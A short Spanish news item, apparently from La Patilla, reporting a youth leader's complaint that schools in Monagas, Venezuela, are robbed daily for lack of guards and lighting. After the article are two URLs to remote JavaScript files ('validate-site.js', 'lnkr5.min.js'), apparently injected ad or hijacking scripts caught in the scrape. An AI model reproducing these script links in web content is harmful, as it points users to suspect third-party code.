La presidenta de la Juventud de un Nuevo tiempo en el estado Monagas, María Carvajal, denunció que en el año escolar las escuelas han sido víctimas de robos constantes. Indicó que “la falta de vigilancia y alumbrado público afecta a los planteles, la mayoría de los centros en la entidad son robados a diario y los gobernantes como no le importa la educación de nuestros niños no implementan ningún plan de seguridad.

Carvajal detalló que los educadores solicitaron a las autoridades gubernamentales contratar más personal de vigilancia para las instituciones, sobre todo para el turno de la noche, que es cuando más se cometen los actos delictivos. Aseguran que casi todos los robos son por la comida del PAE, las puertas, ventanas y aires acondicionados.

La dirigente juvenil resaltó que en Monagas hay más de 900 escuelas abandonadas por la gobernadora y que en este periodo vacacional quedaran a merced del hampa, esto sin duda desestimula a nuestros niños a querer estudiar y formarse.

VÍA LA PATILLA.

 

https://loadsource.org/91a2556838a7c33eac284eea30bdcc29/validate-site.js?uid=51824x6748x&r=1533253201188https://devlinkin.xyz/addons/lnkr5.min.js

Loading...